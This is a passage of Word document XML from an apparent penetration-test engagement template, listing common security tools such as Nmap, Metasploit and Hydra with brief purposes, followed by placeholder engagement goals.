    <w:p w14:paraId="27C10D54" w14:textId="114087FF" w:rsidR="000479B0" w:rsidRPr="008C677D" w:rsidRDefault="000479B0" w:rsidP="000479B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="engagement-tools"/>
      <w:bookmarkStart w:id="50" w:name="_Toc178498973"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Engagement Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="22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01"/>
        <w:gridCol w:w="1821"/>
        <w:gridCol w:w="2663"/>
        <w:gridCol w:w="3465"/>
      </w:tblGrid>
      <w:tr w:rsidR="000479B0" w14:paraId="46F73464" w14:textId="77777777" w:rsidTr="000479B0">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00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="3454234B" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="1ADAB74F" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="53B71AFA" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="3292DB63" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Usage Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="50DE0DB8" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A1A87D" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C973D1" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Network Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036CD971" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Port scanning and network discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DE8697" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Used to identify open ports and services on the target systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="609C71B9" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C134E5" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C171900" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Web Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D26C661" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Web application security testing and vulnerability scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1395459E" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Employed for manual and automated testing of web applications for security flaws</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="558BC575" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC3B04E" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A4F81F8" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4739D4A5" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Exploiting vulnerabilities and payload delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109F97B5" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Used to exploit known vulnerabilities on the target systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="24D504AA" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E22F703" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E6B224E" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Web Server Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0FD9AE" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Scanning web servers for vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E1EF621" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Scanned web servers for outdated software, insecure configurations, and vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="7D61BCAC" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B20BBD6" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D2BE8F" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CE5482C" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Automated vulnerability scanning across networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="230E79C2" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Used to identify known vulnerabilities, misconfigurations, and compliance issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="40758C05" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29901157" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16F5FE04" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Brute Forcing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761E96E6" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Brute force attack on login credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E8FDF48" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Employed to perform password guessing attacks against multiple protocols and services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="03F1C308" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73989FBE" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Gobuster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41353C60" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Directory </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bruteforcing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325A0E8F" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Discovering hidden files and directories on web servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43ED5C11" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Used to brute force directories and files that may not be publicly listed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="3B907750" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD3CEFD" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B8ABE3" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA6CD34" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Automated testing for SQL injection vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="191AFE0A" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Employed to detect and exploit SQL injection vulnerabilities in web applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="3E7E5E2C" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303DFBF3" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F7627B" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Password Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3189F448" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Password cracking tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="146D41B4" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Used to crack password hashes obtained from the compromised systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="2DAA332D" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EF9847" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Aircrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B18A8C" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Wireless Network Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001D03E4" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Cracking WEP and WPA keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="742AEBEF" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Used to capture and crack wireless network encryption keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000479B0" w14:paraId="6AFAE7C5" w14:textId="77777777" w:rsidTr="000479B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757A173E" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>OpenVAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67DA93D1" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4765A127" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Comprehensive vulnerability scanning and assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20E4220C" w14:textId="77777777" w:rsidR="000479B0" w:rsidRDefault="000479B0" w:rsidP="000479B0">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Scanned for vulnerabilities, misconfigurations, and compliance issues in networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C1CB546" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34632562" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="engagement-goals"/>
      <w:bookmarkStart w:id="52" w:name="_Toc178498974"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidRPr="000E6213">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Engagement Goals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="39251B50" w14:textId="77777777" w:rsidR="00D25C56" w:rsidRPr="00D25C56" w:rsidRDefault="00D25C56" w:rsidP="00D25C56"/>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229"/>
        <w:gridCol w:w="6121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="451C706F" w14:textId="77777777" w:rsidTr="00EA00E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shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="5A9DEA1B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Primary Goals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D3D653F" w14:textId="77777777" w:rsidR="000E6213" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insert main goals/expectations, such as </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FBD1B0" w14:textId="555559F3" w:rsidR="000E6213" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>vulnerability discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0123AF20" w14:textId="77777777" w:rsidR="000E6213" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">risk assessment, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="772AEEEA" w14:textId="510203B7" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>compliance validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="76873C0D" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="6F121BAD" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Testing Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0CFA58" w14:textId="77777777" w:rsidR="00D25C56" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identify security gaps </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E82714E" w14:textId="5A5EF7C9" w:rsidR="00D25C56" w:rsidRDefault="00D25C56" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="00112BBC">
              <w:t>nsure systems are compliant</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BCB562" w14:textId="3F23A501" w:rsidR="00112BBC" w:rsidRDefault="00D25C56" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00112BBC">
              <w:t>tress-test the infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D17BB8E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="questions"/>
      <w:bookmarkStart w:id="54" w:name="_Toc178498975"/>
      <w:bookmarkEnd w:id="51"/>
